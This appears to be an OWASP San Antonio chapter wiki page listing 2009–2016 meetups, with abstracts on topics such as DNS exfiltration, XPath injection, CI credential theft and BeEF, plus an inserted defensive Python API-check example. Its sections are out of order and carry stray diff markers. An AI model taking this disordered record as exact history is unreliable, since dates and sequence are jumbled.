Abstract: Come and learn about DNS based data exfiltration and see it in action. We will show you how a few simple scripts we wrote can steal data from a secure network almost without detection using obfuscated DNS lookups. We will cover the concepts, perform a live demo, and show you how to detect this type of malicious activity.

http://www.meetup.com/OWASP-San-Antonio/events/233427790/

'''OWASP San Antonio - June 23, 2016 @ 11:30am'''

Denim Group
1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the June OWASP San Antonio meeting!

Note: New date is Thursday, June 23.

We will have a talk about source-assisted web application penetration testing.

Speaker: Dan Cornell

Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry-leading application vulnerability management platform.

Title: The ABCs of Source-Assisted Web Application Penetration Testing With OWASP ZAP: Attack Surface, Backdoors, and Configuration

Abstract: There are a number of reasons to use source code to assist in web application penetration testing, such as making better use of penetration testers' time, providing penetration testers with deeper insight into system behavior, and highlighting specific sections of code so development teams can remediate vulnerabilities faster. Examples of these are provided using the open source ThreadFix plugin for the OWASP ZAP proxy and dynamic application security testing tool. These show opportunities attendees have to enhance their own penetration tests given access to source code.

This presentation covers the "ABCs" of source code assisted web application penetration testing: covering issues of attack surface enumeration, backdoor identification, and configuration issue discovery. Having access to the source lets an attacker enumerate all of the URLs and parameters an application exposes – essentially its attack surface. Knowing these allows pen testers greater application coverage during testing. In addition, access to source code can help to identify potential backdoors that have been intentionally added to the system. Comparing the results of blind spidering to a full attack surface model can identify items of interest such as hidden admin consoles or secret backdoor parameters. Finally, the presentation examines how access to source code can help identify configuration settings that may have an adverse impact on the security of the deployed application.

http://www.meetup.com/OWASP-San-Antonio/events/231594503/

'''Meeting Schedule for 2010'''

Dates are set - speakers and topics are firming up as we speak. All meetings are from 11:30am - 1:00pm at the San Antonio Technology Center (Web Room), 3463 Magic Drive, San Antonio, TX 78229.

Wednesday January 20th - OWASP LiveCD: An Open Environment for Web Application Security by Matt Tesauro
Wednesday March 17th - TBD
Wednesday May 19th - TBD
Wednesday July 21st - TBD
Wednesday September 15th - TBD
Wednesday November 10th - TBD

'''San Antonio OWASP Chapter: Wed January 20th, 2010'''

Topic: OWASP LiveCD: An Open Environment for Web Application Security

Presenter: Matt Tesauro, OWASP Board Member, LiveCD Project Lead

Date: Wednesday January 20th, 2010 11:30am – 1:00pm

Location:
San Antonio Technology Center (Web Room)
3463 Magic Drive
San Antonio, TX 78229
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229

Abstract:
The OWASP Live CD is a project that collects some of the best open source security projects in a single environment. Web developers, testers and security professionals can boot from this Live CD and have access to a full security testing suite. This allows its users to test for various security issues in web applications and web sites. The Live CD also contains documentation and an interactive learning environment to enhance users' web application security knowledge. This presentation will cover the current state of the OWASP Live CD as well as the plans for future developments. Time permitting, a live demonstration of the OWASP Live CD will be conducted. The OWASP Live CD is a project of the Open Web Application Security Project (OWASP) and is free for commercial or non-commercial use. More information is available at: http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

Presenter Bio:
Matt Tesauro has worked in web application development and security since 2000. He has worn many different hats, from developer to DBA to System Administrator to Penetration Tester. Matt also taught graduate and undergraduate classes on web application development and XML at Texas A&M University. Currently, he's focused on implementing a comprehensive web application security program for the Texas Education Agency (TEA). Outside work, he is a member of the OWASP Foundation's Board of Directors, the project lead for the OWASP Live CD and a member of the OWASP Global Projects Committee; he also assists the OWASP Austin chapter's leadership and is a member of ISSA of Austin, Texas. Matt Tesauro has a B.S. in Economics and an M.S. in Management Information Systems from Texas A&M University. He also has the CISSP, CEH (Certified Ethical Hacker), RHCE (Red Hat Certified Engineer), and Linux+ certifications.

Sodas and snacks will be provided. Feel free to bring a brown-bag lunch.

Please RSVP: E-mail owasprsvp@denimgroup.com or call (210) 572-4400.

Recent Meetings:

'''San Antonio OWASP Chapter: October 21, 2009'''

Topic: Rolling Out an Enterprise Source Code Review Program

Presenter: Dan Cornell, Principal at Denim Group

Date: October 21, 2009 11:30 a.m. – 1:00 p.m.

Location:
San Antonio Technology Center (Web Room)
3463 Magic Drive
San Antonio, TX 78229
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229

Abstract:
Source code review technology has rapidly advanced over the past several years and offers great promise of helping organizations detect and address software security defects. However, many organizations stumble as they try to roll out these technologies because they fail to understand the people and process issues that must also be addressed. This talk will present lessons learned from the creation of several enterprise source code review programs, including: identifying all sources of custom code in an organization (including custom extensions to ERP systems and enterprise portals), selecting the first round of applications to scan, successfully interpreting results and driving resolution of identified issues.

Presenter Bio:
Dan Cornell has over ten years of experience architecting and developing web-based software systems. As CTO of Denim Group, he leads the organization's technology team, overseeing methodology development and project execution for Denim Group's customers. He also heads the Denim Group security research team, investigating the application of secure coding and development techniques to the improvement of web-based software development methodologies.

Dan Cornell has performed as the CTO of BrandDefense, as founder and Vice President of Engineering for Atension prior to its acquisition by Rare Medium, Inc. and as the Vice President, Global Competency Leader for Rare Medium's Java and Unix Competency Center. Cornell has also developed simulation applications for the Air Force with Southwest Research Institute.

Dan was the founding coordinator and chairman for the Java Users Group of San Antonio (JUGSA) and is currently the chapter leader of the San Antonio chapter of the Open Web Application Security Project (OWASP). He is a recognized expert in the area of web application security for SearchSoftwareQuality.com and the primary author of Sprajax, Denim Group's open source tool for assessing the security of AJAX-enabled web applications.

'''OWASP San Antonio - May 20, 2016 @ 11:30am'''

Denim Group
1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the May OWASP San Antonio meeting!

Note: New date is Friday, May 20 to avoid Memorial Day conflicts.

We will have a talk about Runtime Application Self-Protection (RASP).

Speaker: Kunal Anand

Bio: Kunal is the co-founder and CTO of Prevoty, a next-generation application security platform. Prior to that, he was the Director of Technology at BBC Worldwide, overseeing engineering and operations across the company's global Digital Entertainment and Gaming initiatives. Kunal also has several years of experience leading security, data and engineering at Gravity, MySpace and NASA's Jet Propulsion Laboratory. His work has been featured in Wired Magazine and Fast Company. He continues to develop the patented security technologies that power Prevoty's core products. Kunal received a B.S. from Babson College.

Title: Runtime Application Self-Protection (RASP) Tools

Abstract: Kunal will be discussing Runtime Application Self-Protection (RASP) and a new high-performance methodology called language-theoretic security (LANGSEC). Kunal will also break down how lexers, tokenizers and parsers work, and construct an open source toolchain to analyze data and explore interactive data visualizations, covering the challenges of modern AppSec along the way.

http://www.meetup.com/OWASP-San-Antonio/events/231044053/

'''OWASP San Antonio - April 29, 2016 @ 11:30am'''

Denim Group
1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the April OWASP San Antonio meeting! We will have a talk about AppSec Pipelines!

Speaker: Matt Tesauro

Bio: Matt Tesauro is a founder and CTO of Infinitiv, a Senior Software Security Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace. He is also an Adjunct Professor for the University of Texas Computer Science department, teaching the next generation of CS students about Application Security. Matt is a broadly experienced information security professional of 15 years specializing in application and cloud security. He has also presented and provided trainings at various international industry events including the DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, AppSec US, EU and LATAM. His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at the University of Texas and Texas A&M University. He is a former board member of the OWASP Foundation and project lead for the OWASP AppSec Pipeline & WTE projects. WTE is a collection of application security testing tools. He holds two degrees from Texas A&M University and several security and Linux certifications.

Title: Taking AppSec to 11: AppSec Pipelines, DevOps and Making Things Better

Abstract: How many applications are in your company's portfolio? What's the headcount for your AppSec team? Whatever your situation is, I am sure the numbers are not in your favor. It's not time to find a new career, it's time to up your game. This talk will cover how to take your small merry band of AppSec professionals and scale it up to a virtual army. By taking the best of DevOps, Agile and CI/CD, you can iteratively up your AppSec game over time and begin your ascent out of the security hole you are in.

The talk covers real world experiences running AppSec groups at two different companies: Rackspace with approximately 4,000+ employees and Pearson with 40,000+. Both have an international presence and far more apps and developers than AppSec staff. The talk covers the key principles to speed and scale up AppSec programs using an AppSec Pipeline as well as practical examples of these practices put into use. Start early and begin to buy down the technical security debt which feels inevitable with more traditional AppSec program thinking.

'''OWASP San Antonio - March 25 @ 11:30am'''

Denim Group
1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the March OWASP San Antonio meeting! We will have a talk about giving tech talks!

Speaker: Major Hayden

Bio: Major Hayden started at Rackspace in 2006 as a Linux support technician. Over the years, he has worked in support, software development, operations, and information security roles. Major currently works with the OpenStack Private Cloud team with a focus on operations and information security. He blogs frequently on major.io and has been known to use Twitter from time to time.

Title: Taming the Technical Talk

Abstract: Many technical people inevitably find themselves up against the most terrifying challenge of their careers: giving a technical talk. Talking in front of large groups of people is never easy, but it can transform the future of software projects or the careers of individuals. This nerve-wracking career catalyst can be tamed, however, through careful planning and thoughtful delivery.

During this talk, we will embark on a journey to overcome our fears and deliver high quality technical talks to small or large groups. We will cover everything from the early stages, such as choosing a topic, all the way to the day of the talk itself.

http://www.meetup.com/OWASP-San-Antonio/events/228893612/

'''OWASP San Antonio - February 26 @ 11:30am'''

Denim Group
1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the February OWASP San Antonio meeting! We will have a talk about Automated API testing!

Speaker: Matt Valdes

Bio: Matt Valdes is a Security Developer in Test on the Security and Quality Engineering team at Rackspace. Throughout his career, he has been involved in all aspects of the SDLC and is passionate about security testing, process engineering and automation.

Title: Automating Security Tests for APIs

Abstract: RESTful APIs are an increasingly common attack vector for applications. Despite this ever-present threat, open source and commercial vendor support for automatic API security scanners remains limited. With the rate at which APIs are developed, enhanced and deployed, this lack of security test automation creates a gap that at its best limits adoption, and at its worst may leave an application open to attack. To fill the gap in security testing efficiency, members of the Rackspace Quality Engineering and Security Engineering teams worked together to create an open source, automated API security scanner.

Syntribos is a flexible, automated scanner that provides configurable test coverage for any HTTP API. Learn how Syntribos enables you to test HTTP APIs in an automated way, helping to detect and eliminate common security vulnerabilities such as SQL injection, command injection, denial of service attacks, and more.

https://github.com/openstack/syntribos

'''San Antonio OWASP Chapter: August 19, 2009'''

Topic: Web Application Firewalls (WAFs)

Presenter: Matt Burriola & Mario Flores, Randolph-Brooks Federal Credit Union

Date: August 19, 2009 11:30am – 1:00pm

Location:
San Antonio Technology Center (Web Room)
3463 Magic Drive
San Antonio, TX 78229
http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229

'''OWASP San Antonio - January 29 @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the first OWASP San Antonio meeting of 2016! We will have a talk about XPath Attacks!
 +
 
 +
 
 +
Speaker: Luis Torres
 +
 
 +
 
 +
Bio: Luis Torres is a security consultant with VerSprite. An avid pen tester, researcher, CTF participant, and bug bounty winner - Luis is a key consultant for VerSprite's AppSec Consulting practice where he focuses his time on client-server, cloud, web services, and fat client security testing. His recent research has been around more damaging exploits around XPath injection which he seeks to share with you today.
 +
 
 +
 
 +
Title: XPath Awakens - Attacks & Impact Around XPath Injection
 +
 
 +
 
 +
Abstract: XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses XML. Threat agent goals are often aim to circumvent authentication and/or access information in an unauthorized manner.
 +
 
 +
 
 +
Developers today use XPaths to perform actions over XML based documents, however insecure coding practices could lead allow for injection issues to surface in web applications. Blind XPath Injection retrieves information by making true/false interrogations with web applications, however they mostly focus on retrieving current query information, skipping sensitive information on XML nodes outside of current query requests. This presentation will extend beyond these blind injection attacks and discuss how to retrieve the entire XML document, using Blind XPath Injection techniques.
 +
 
 +
 
 +
'''OWASP San Antonio - September 18 @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the September 2015 OWASP San Antonio meeting! We will have a talk about detecting security breaches!
 +
 
 +
 
 +
Speaker: Josh Sokol
 +
 
 +
 
 +
Bio: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped "HTTPSCan Byte Me" talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.
 +
 
 +
Title: The Fox is in the Henhouse: Detecting a Breach Before the Damage is Done
 +
 
 +
Abstract: Your firewall is a sieve with more holes poked in it than your Grandmother's pin cushion, your IPS doesn't know a breach from a hole in the ground, and your signature-based anti-virus can't keep up with the ever changing tide of malware being hurled at you from every direction.  It's time to take a deep breath and admit to ourselves that the traditional methods of keeping the bad guys out of our networks have failed us.  Just over two years ago, we began focusing much of our efforts on incident detection and response.  Rather than sinking our precious time and money into tools that would become obsolete before the next BlackHat, we decided to take the time to analyze our networks and got creative with different ways to find the systems that have been compromised that those other technologies couldn't detect.  In this presentation, we will walk you through the analytics we are running, the tools that we are using, and the techniques that we employ to find and remediate the bad guys from our networks.  Good security doesn't have to break the bank; it just has to break the mold.
 +
 
 +
 
 +
 
 +
'''OWASP San Antonio - August 28th @ 11:30am'''
 +
 
 +
Denim Group
 +
1354 N Loop 1604 E Ste 110, San Antonio, TX
 +
 
 +
 
 +
Join us for the August 2015 OWASP San Antonio meeting! We will have a talk about building, sniffing and breaking Zigbee (IoT).
 +
 
 +
 
 +
Speaker: David Lister
 +
 
 +
Bio: David Lister (CISSP, CASP, CCISO, CCNA, CEH, ECSA, CPT, RHCSA, Security+) has also been active in various roles involving systems administration, network security, incident response, penetration testing, and application security. David holds a Master's degree in Infrastructure Assurance from the University of Texas San Antonio, and is a member of the ISSA, San Antonio Hackers Anonymous, and OWASP.

Title: Building, Sniffing, and Breaking Zigbee

Abstract: This will be a shallow dive into how you can get up and running with Zigbee, what it is and what it's used for. Also covered will be some of the known ways to break Zigbee networks, and how this relates to application security.

Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/224725183/


'''OWASP San Antonio - July 31st @ 11:30am'''

Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the July 2015 OWASP San Antonio meeting! We will be having a talk about compromising Continuous Integration systems.

Speaker: Greg Anderson

Bio: Greg Anderson works for Rackspace where he helps to drive test automation and security.

Title: Is This Your Pipe? Compromising Build and Automation Pipelines

Abstract: As developers of the web, we rely on tools to automate building code, run tests, and even deploy services. What happens when developers do CI/CD wrong? Credentials get exposed, hijacked, and re-purposed. I'll talk about how often, where, and what happens when people leak public cloud credentials, how some are protecting themselves using encrypted secrets, how to bypass protections against leaking secrets and how to turn someone's Jenkins install into your own butler. Come hijack credentials out of repositories, steal hidden and encrypted secrets using builds, and hijack infrastructure via continuous integration systems.

Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/223970537/


'''OWASP San Antonio - June 26th @ 11:30am'''

Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the June 2015 OWASP San Antonio meeting. We will be having a talk about Continuous Integration and Continuous Deployment (CI/CD) of OpenStack.

Speaker: Michael Xin

Bio: Michael Xin is a manager of security engineering at Rackspace. Before that, he was a senior application security engineer at Scottrade Inc. Michael is interested in web application, web service and API security, mobile application security and cloud security. Michael has years of experience with application security assessment, security code review and the security SDLC.

Title: OpenStack Security CI/CD Way

Abstract: As OpenStack becomes popular, Continuous Integration and Continuous Deployment (CI/CD) of OpenStack is gaining attention. Customers need the ability to deploy multiple times every day to meet their business needs. This is a huge challenge to application security. Traditional web application security testing and API security testing are manual processes aided by various tools. The tests are time consuming and lack consistency. It is almost impossible to embed these types of security testing into a CI/CD process.

At Rackspace, the security engineering team is working with quality engineers and developers to integrate security testing into the CI/CD process. The security engineering team uses the same framework/tool that the quality engineers use to ease integration. Currently we are focusing on API security testing automation and web application security testing. We are working on a couple of approaches to integrate security test cases with the QE testing framework. The security test cases cover necessary security checks, including common security vulnerability checks and some product-specific checks. These security test cases can be run by anyone on the team. They can also be invoked as Jenkins jobs as part of the integration test. A failed security test case indicates some type of security defect and needs to be remediated.

The security testing automation improves the consistency, repeatability and auditability of our security testing process. Security testing within the CI/CD process can detect security defects at an early stage and reduce remediation costs.
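As an added illustration of the kind of security test case the abstract describes (example code written for this page, not the talk's own code and not Rackspace's opencafe tests), the following Python module runs a few API security checks and returns findings that a CI job can fail the build on. The `Response` stand-in, the endpoint URLs, headers and bodies are all constructed for the example rather than taken from any real service.

```python
"""Security test cases of the kind a CI job can run against an API.

Added example, not the talk's own code. The responses below are
constructed in-line so the checks run offline; in a real pipeline
they would come from HTTP calls made by the QE test framework.
"""
from dataclasses import dataclass, field


@dataclass
class Response:
    """Minimal stand-in for an HTTP response (constructed for the example)."""
    url: str
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""
    authenticated: bool = True   # was a valid token sent with the request?


def check_auth_required(resp):
    """Unauthenticated requests to a protected endpoint must be rejected."""
    if not resp.authenticated and resp.status < 400:
        return f"{resp.url}: served {resp.status} without credentials"
    return None


def check_security_headers(resp):
    """Common defensive headers, compared case-insensitively."""
    lower = {k.lower(): v for k, v in resp.headers.items()}
    findings = []
    if lower.get("x-content-type-options", "").lower() != "nosniff":
        findings.append(f"{resp.url}: missing X-Content-Type-Options: nosniff")
    if lower.get("access-control-allow-origin") == "*":
        findings.append(f"{resp.url}: wildcard CORS origin")
    if "server" in lower and any(ch.isdigit() for ch in lower["server"]):
        findings.append(f"{resp.url}: Server header leaks a version ({lower['server']})")
    return findings


def check_error_disclosure(resp):
    """Server errors must not leak stack traces or internal paths."""
    if resp.status >= 500:
        markers = ("Traceback (most recent call last)", 'File "/', "at java.")
        if any(m in resp.body for m in markers):
            return f"{resp.url}: stack trace in error response"
    return None


def run_security_checks(responses):
    """Return all findings; an empty list means the build may proceed."""
    findings = []
    for resp in responses:
        for single in (check_auth_required(resp), check_error_disclosure(resp)):
            if single:
                findings.append(single)
        findings.extend(check_security_headers(resp))
    return findings


# Constructed sample responses: one well-behaved endpoint and two defective ones.
SAMPLE_RESPONSES = [
    Response("https://api.example.test/v2/servers", 401,
             {"X-Content-Type-Options": "nosniff"}, '{"error": "unauthorized"}',
             authenticated=False),
    Response("https://api.example.test/v2/images", 200,
             {"Server": "nginx/1.4.6", "Access-Control-Allow-Origin": "*"},
             '{"images": []}', authenticated=False),
    Response("https://api.example.test/v2/flavors/x", 500,
             {"X-Content-Type-Options": "nosniff"},
             'Traceback (most recent call last):\n  File "/srv/nova/api.py", line 12',
             authenticated=True),
]

if __name__ == "__main__":
    import sys
    problems = run_security_checks(SAMPLE_RESPONSES)
    print("\n".join(problems) or "no security findings")
    sys.exit(1 if problems else 0)   # non-zero exit fails the Jenkins job
```

The checks are written as functions that return findings rather than print them, so the same code can sit inside a test runner or a Jenkins job step whose exit status gates the deploy; in a real pipeline the responses come from the QE framework's HTTP calls instead of the constructed list.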
Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/223161579/

Slides: http://www.slideshare.net/michaelxin2015/openstack-security-cicd-way

Tools mentioned in the talk:

https://github.com/stackforge/opencafe

https://wiki.openstack.org/wiki/Security/Projects/Bandit


'''OWASP San Antonio - May 29, 2015 @ 11:30am'''

Denim Group - 1354 N Loop 1604 E Ste 110, San Antonio, TX

Join us for the May 2015 OWASP San Antonio meeting. We will be having a talk about Mobile Application Security Assessments.

Speaker: Dan Cornell

Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As Chief Technology Officer and Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process.

Title: Application Security Assessments By The Numbers: A Whole-Istic View

Abstract:

By analyzing the data from over 60 mobile application security assessments, we identify the typical types of mobile vulnerabilities, the system components that contain those vulnerabilities, the components where given types of vulnerabilities cluster, and how to test for each of these. Attendees will learn in the session how to identify these vulnerabilities, how to create and implement an effective mobile security plan, and where to focus their limited testing resources to minimize mobile application portfolio risks. This is critical because automated web application testing tools are able to easily find vulnerabilities, while today's mobile security industry does not offer automated testing tools that can effectively test web services (i.e. the interaction between mobile clients and back-end services). As a result, best practices for mobile application testing must incorporate significant, often laborious, manual testing. At this point in the presentation, we will use the statistics from the research to define the appropriate manual testing that needs to be implemented.

Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

http://www.meetup.com/OWASP-San-Antonio/events/222536787/


'''OWASP Invites You to Attend InnoTech San Antonio as our Guest'''

InnoTech, presented by Presidio, is San Antonio's premier IT and security focused conference & expo. We're celebrating eight years of education, technology and networking at this year's event and you won't want to miss it! Mark your calendars now and plan on attending!

Thursday, April 9, 2015 at the Henry B. Gonzalez Convention Center

A limited number of complimentary passes are available for InnoTech San Antonio. Please register at innotechsan.com and use the discount code that you received from your OWASP email list for complimentary admission. Includes coffee, lunch for the first 125 in line and an afternoon reception.

Check out the list of speakers and technology demos by visiting http://www.innotechconferences.com/sanantonio/


'''OWASP San Antonio - March 20th 2015'''

On March 20th the OWASP San Antonio Chapter is having a FREE one-day, single-track conference featuring talks about secure software development, securing the SDLC and application security testing. Whether you're an information security professional, software developer, or just interested in computer security, anyone and everyone is welcome. We have an all-star set of speakers that will be covering all aspects of managing a security program as well as in-depth testing methodologies.

Map:

http://bit.ly/owasp-map

Full Program:

http://bit.ly/owasp-program

Schedule:

9:15 - 9:30: Welcome, Sign-in, kickoff

9:30 - 10:30: Keynote, Scaling an Application Security Program, Glenn Leifheit, Principal Security Architect, Microsoft

One of the largest challenges today is the rapid change in speed of software. We will journey on the path of accelerating but maintaining security, from small startup to largest enterprise, from waterfall to agile. Along the way there will be lessons learned, from successes and failures. What steps can you take to bring security to the next level? Application security is not an easy profession; let's learn together to take us all to the next level.

About Glenn: Glenn Leifheit is Principal Security Architect for Microsoft Information Technology's ACE (Assessment, Consulting and Engineering) Team. In this role he provides security advice to Microsoft internally as well as to external customers. Prior to joining Microsoft, Glenn created, developed and led the application security program for FICO (Fair Isaac Corporation). He also led FICO's PCI program. He is a former co-chair and current member of the (ISC)2 Application Security Advisory Council, where he helps evangelize for strong application security and advocates for change throughout the industry. Through Glenn's 20-year career in information technology he has focused on security, architecture, OS and middleware design, and operations, along with software development. Glenn holds both the CISSP and CSSLP certifications. He is also passionate about evangelizing security practices to the development community, engaging in over 50 conferences, user groups and code camps as a speaker or panel member. Glenn is also a founding member of TechMasters, a Toastmasters group designed to create a technical speaker community.

10:30 - 11:30: Maximizing Security with Minimal Resources, Chris Maier, Principal Architect, Rackspace

Ever wonder how to intelligently spend your security dollars on the systems that matter most? Are you faced with the common problem of "I don't have an unlimited security budget but I am required to secure all the things"? This session will present concepts, methodologies, and tooling to help you identify your critical systems, set a prescriptive value on your data assets, and rank the systems and information in a way that helps highlight where you should focus your security efforts and dollars. We will also cover how to present this information in a manner that is more business focused, and to ensure that the business understands the risk vs. reward of securing and protecting each of the assets.

About Chris: Chris Maier is a Principal Architect at Rackspace, and in his current role helps design and implement shared infrastructure systems in a secure and compliant manner. Chris has nearly 18 years of production operations experience on a variety of systems including email, identity, databases, directory servers, and a variety of application servers. Chris has written scripts and code in Bash, VB, Java, C, C++, and a little Python for many of the systems he has supported over the years. Because of the 10-plus years spent on identity and authentication systems, Chris is very cognizant of and familiar with a wide variety of security issues and security best practices. Some of Chris' previous positions have included primary DBA for a SOX & PCI compliant billing system, identity infrastructure lead engineer, hosted Exchange lead engineer, infrastructure systems lead engineer, and eLearning lead engineer.

11:30 - 12:45: Lunch (provided)

12:45 - 1:45: Convincing Your Management, Your Peers, and Yourself that Risk Management Doesn't Suck, Josh Sokol, Information Security Program Owner, National Instruments

As security professionals, almost every action we take comes down to making a risk-based decision. Web application vulnerabilities, malware infections, physical vulnerabilities, and much more all boil down to some combination of the likelihood of an event happening and the impact of that event. Risk management is a relatively simple concept to grasp, but the place where many practitioners fall down is in the tool set.

The lucky security professionals work for companies who can afford expensive GRC tools to aid in managing risk. The unlucky majority out there usually end up spending countless hours managing risk via spreadsheets. It's cumbersome, time consuming, and just plain sucks. After starting a Risk Management program from scratch at a $1B/yr company, I ran into these same barriers, and where budget wouldn't let me go down the GRC route, I finally decided to do something about it. SimpleRisk is a simple and free tool to perform risk management activities.

Based entirely on open source technologies and sporting a Mozilla Public License 2.0, a SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews. It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly. It is under active development with new features being added all the time and can be downloaded for free or demoed at http://www.simplerisk.org. With a simple, powerful, and cost-effective tool and some basic risk management knowledge at your disposal, you too can become the security rock star that your business seeks out for risk-based decision making. Let me show you how to convince your management, your peers, and yourself that Risk Management doesn't suck.

About Josh: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped "HTTPS Can Byte Me" talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.

1:45 - 2:45: Automating Security Tests with Selenium, Brady Vitrano, Lead Quality Engineer, Rackspace, and Charles Neill, Security Engineer, Rackspace

Rackspace Quality and Security Engineers are building a framework to automate both functional testing and security testing within the browser. To cover the basics, this presentation looks at our approach to automating functional testing and security testing for web applications. You will learn about Selenium, and how to write some tests of your own. We will also teach you how to run your test cases using a Selenium grid to speed up the testing process.

About Brady: Brady is an aspiring mad scientist.

About Charles: Charles is a Security Developer - Test II on the Security Engineering team at Rackspace. He enjoys finding new vulnerabilities in everything from web apps to smart TVs.

Slides: https://www.owasp.org/images/4/49/Owasp_automation_talk.pptx

2:45 - 3:45: Making Security as Agile as Development: Adding DevOps and TDD to your security program, Matt Tesauro, Application Security Leader, Pearson

Software and application development are not slowing down. Is your AppSec program able to keep pace? With agile development, continuous deployment, DevOps, and Cloud, the pace of change in the software industry has only increased. As an AppSec professional, you face rapidly delivered services while making sure they are built reliably and securely. When you are deploying multiple times a day, there is no time to fit in your traditional week-long security assessment.

This talk will cover how Matt has put these practices in place at Pearson after doing similar work at Rackspace, and the key ways to keep your AppSec program agile enough to keep up with the pace of change today. Methods will be discussed for securing infrastructure, apps, APIs and source code. Even if you are not in the DevOps, CI/CD world today, you will be soon enough. It's time to embrace the change and say "Challenge Accepted".

About Matt:

Matt Tesauro is the Application Security Lead Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace. He is also an Adjunct Professor for the University of Texas Computer Science department, teaching the next generation of CS students about Application Security. Matt is a broadly experienced information security professional of 15 years specializing in application and cloud security. He has also presented and provided training at various international industry events including the DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, and AppSec US, EU and LATAM. His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at Texas A&M University. He is a former board member of the OWASP Foundation and project lead for the OWASP WTE project, a collection of application security testing tools. He holds two degrees from A&M University and several security and Linux certifications.

3:45 - 4:00: Close


'''OWASP San Antonio Chapter - Feb 11 2015 @ 11:30am'''

Come to the first OWASP San Antonio meeting of 2015. We will be having a talk on BeEF - the Browser Exploitation Framework Project and discussing plans for the rest of 2015.

Speaker: Charles Neill

Bio: Charles is a Security Developer at Rackspace, where he does application security for products developed in-house, as well as OpenStack projects and other third-party products. He also develops tools to assist with security testing.

Title: Introduction to Cross-Site Scripting with BeEF

Abstract:

Cross-site scripting is a well-known attack vector at this point, but many people still don't understand the full risk of being vulnerable to it. BeEF is a framework that combines lots of different tools that can be useful to an attacker after finding a cross-site scripting bug in a site. The purpose of this talk is to demonstrate the potential severity of a cross-site scripting attack, leveraging BeEF to trick the user in various ways and to try to get as much useful information out of them as possible.

Slides: https://www.owasp.org/images/e/e1/Xss-owasp.pptx


'''Text from the previous revision of this page (2009–2010 meetings and earlier slide decks)'''

Abstract:

Web Application Firewalls

Web application firewalls (WAFs) have gained considerable momentum as web vulnerabilities have grown. WAFs now have a proven record of reducing exposure to web vulnerabilities by blocking malicious activity, much like a typical firewall. While WAFs help, it does take time to consider when a WAF is appropriate, and it takes time to evaluate and implement the WAF as well. Come listen to the reasons why Randolph-Brooks Federal Credit Union chose a WAF and what they learned in the process.

Presenter Bio:

Matt is a Senior Developer on the RBFCU Web Team, but mainly serves the roles of Configuration Management lead and Systems Admin for the team. Matt maintains the source control repository, application build and release processes, and QA server environments. Matt also works on web infrastructure initiatives such as the Web Application Firewall. Matt has 10 years of IT industry experience, including Java/web technologies, C, C++, Unix/Linux, shell scripting, and Symbol mobile handheld programming. Matt has a degree in Management Information Systems from Texas A&M University-Corpus Christi.

Mario is currently the Web Development manager for RBFCU. In this role, Mario manages the development efforts for the online banking site and the intranet. Mario also has a solid background in web security and has addressed issues found by web application penetration assessments. Mario has worked for RBFCU for 14 years and he has a degree in Information Systems from Texas Lutheran University.


'''San Antonio OWASP Chapter: June 17, 2009'''

Topic: What is Cross Site Scripting and Why Is It Bad?

Date: June 17, 2009 11:30am – 1:00pm

Location:

San Antonio Technology Center (Web Room)
3463 Magic Drive
San Antonio, TX 78229

http://maps.google.com/maps?f=q&hl=en&q=3463+Magic+Drive,+San+Antonio,+TX+78229

Abstract:

